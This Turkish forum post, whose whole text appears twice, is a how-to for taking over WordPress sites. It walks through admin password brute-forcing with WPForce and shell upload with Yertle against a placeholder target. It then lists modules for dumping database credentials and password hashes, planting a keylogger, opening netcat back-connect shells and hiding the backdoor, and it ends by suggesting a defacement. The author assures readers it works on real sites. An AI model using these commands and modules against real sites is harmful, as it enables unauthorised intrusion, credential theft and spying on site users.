Selamun aleyküm değerli kardeşlerim.
WordPress Sitelere Sızma Tesinin Gerekli Olduğunu Düşündüm.
Hedef Aldığımız Bir WordPress Sitenin tabiri caizse içinden geçiceğiz.
NOT: Kullanılan araçları ben kodlamadım.Emek hırsızlığı değil bilmeyenlere rehberdir.
Gerekli Tool : https://github.com/n00py/WPForce
Kali Linux'a geçiş yapalım.Windows'a python yükleyip çalıştırabilir misiniz ? denemek lazım.
Ben kendi pcme bir sanal makinada wordpress kurdum anlatım onun üzerinden olacaktır.
Gerçek sitelerde de aynı sonuçları verir endişe etmeyiniz.
---------------------------------------------------------------------------------------------------------------------------------------------
Adım 1
Tool ların ayarlanması
Terminal açıp :
root@general:~# cd Desktop
root@general:~# ls
WPForce-master.zip
root@general:~# unzip WPF*
root@general:~# cd WP*
root@general:~# chmod +x *
---------------------------------------------------------------------------------------------------------------------------------------------
Adım 2
Hedefi Deneme
Hedefi denemekten kasıt.Admin Password deneme yanılmasıdır.
Deneyeceğeniz şifre listesi size bağlıdır .
root@general:~# python wpforce.py -i users.txt -w pass.txt -u http://www.site.com/
-i parametresi kullanıcı adı listesi
-w şifre listesi
-u site url
eğer şifre bulunursa alacağınız çıktı böyle olacak :
---------------------------------------------------------------------------------------------------------------------------------------------
Adım 3
Hedefe Shell Atma
Yertle adlı program bize bunu otomatik olarak sunuyor.
root@general:~# python yertle.py -u username -p password -t http://www.site.com/ --interactive
hareket alanımız çok geniş hem de tek bir tool yardımıyla bu kadar
işlemi yapabilme kapasitesine sahip oluyoruz.
püf nokta: Kusura bakmayın ama gerçek olan şu ki bu programı kullanıp site hacklemek marifet değildir.Önemli olan bu toolları yazabilecek kapasitede olmaktır.
beef --> beef bir çeşit browser hack aracı.Javascript kodunu hedef browserda açıp çalıştırarak kurban sistem üzerinde bazı işlemler yapmanıza olanak sağlar.
Beef in gücünü anlatmaya kalkarsam konu bitmez ona daha sonra değinelim.
dbcreds --> database(veritabanı) bilgilerini verir
hashdump --> sitedeki kullanıcıları ve hash halinde şifrelerini verir.
keylogger --> siteye keylogger yerleştiriyor.Bu sayede örneğin bir kullanıcı siteye login oldu yazdığı şeyler bize geliyor.
keylog --> basılan tuşları listeliyor.
meterpreter --> msfconsole üzerinden devam edebilme olanağı sağlıyor
shell --> netcat programıyla back connect tarzı olaylara olanak sağlıyor
stealth --> yertle 'ın eklentisini gizliyor.(plugins menüsündeki)
veya m e t a sploit komutu ile
Ufak bir deface işlemi yapalım abisi
Emek verdim yabana atmayın lütfen İyi forumlar ...
WordPress Sitelere Sızma Tesinin Gerekli Olduğunu Düşündüm.
Hedef Aldığımız Bir WordPress Sitenin tabiri caizse içinden geçiceğiz.
NOT: Kullanılan araçları ben kodlamadım.Emek hırsızlığı değil bilmeyenlere rehberdir.
Gerekli Tool : https://github.com/n00py/WPForce
Kali Linux'a geçiş yapalım.Windows'a python yükleyip çalıştırabilir misiniz ? denemek lazım.
Ben kendi pcme bir sanal makinada wordpress kurdum anlatım onun üzerinden olacaktır.
Gerçek sitelerde de aynı sonuçları verir endişe etmeyiniz.
---------------------------------------------------------------------------------------------------------------------------------------------
Adım 1
Tool ların ayarlanması
Terminal açıp :
root@general:~# cd Desktop
root@general:~# ls
WPForce-master.zip
root@general:~# unzip WPF*
root@general:~# cd WP*
root@general:~# chmod +x *
---------------------------------------------------------------------------------------------------------------------------------------------
Adım 2
Hedefi Deneme
Hedefi denemekten kasıt.Admin Password deneme yanılmasıdır.
Deneyeceğeniz şifre listesi size bağlıdır .
root@general:~# python wpforce.py -i users.txt -w pass.txt -u http://www.site.com/
-i parametresi kullanıcı adı listesi
-w şifre listesi
-u site url
eğer şifre bulunursa alacağınız çıktı böyle olacak :
---------------------------------------------------------------------------------------------------------------------------------------------
Adım 3
Hedefe Shell Atma
Yertle adlı program bize bunu otomatik olarak sunuyor.
root@general:~# python yertle.py -u username -p password -t http://www.site.com/ --interactive
hareket alanımız çok geniş hem de tek bir tool yardımıyla bu kadar
işlemi yapabilme kapasitesine sahip oluyoruz.
püf nokta: Kusura bakmayın ama gerçek olan şu ki bu programı kullanıp site hacklemek marifet değildir.Önemli olan bu toolları yazabilecek kapasitede olmaktır.
beef --> beef bir çeşit browser hack aracı.Javascript kodunu hedef browserda açıp çalıştırarak kurban sistem üzerinde bazı işlemler yapmanıza olanak sağlar.
Beef in gücünü anlatmaya kalkarsam konu bitmez ona daha sonra değinelim.
dbcreds --> database(veritabanı) bilgilerini verir
hashdump --> sitedeki kullanıcıları ve hash halinde şifrelerini verir.
keylogger --> siteye keylogger yerleştiriyor.Bu sayede örneğin bir kullanıcı siteye login oldu yazdığı şeyler bize geliyor.
keylog --> basılan tuşları listeliyor.
meterpreter --> msfconsole üzerinden devam edebilme olanağı sağlıyor
shell --> netcat programıyla back connect tarzı olaylara olanak sağlıyor
stealth --> yertle 'ın eklentisini gizliyor.(plugins menüsündeki)
veya m e t a sploit komutu ile
Ufak bir deface işlemi yapalım abisi
Emek verdim yabana atmayın lütfen
İyi forumlar ...
Son düzenleme:
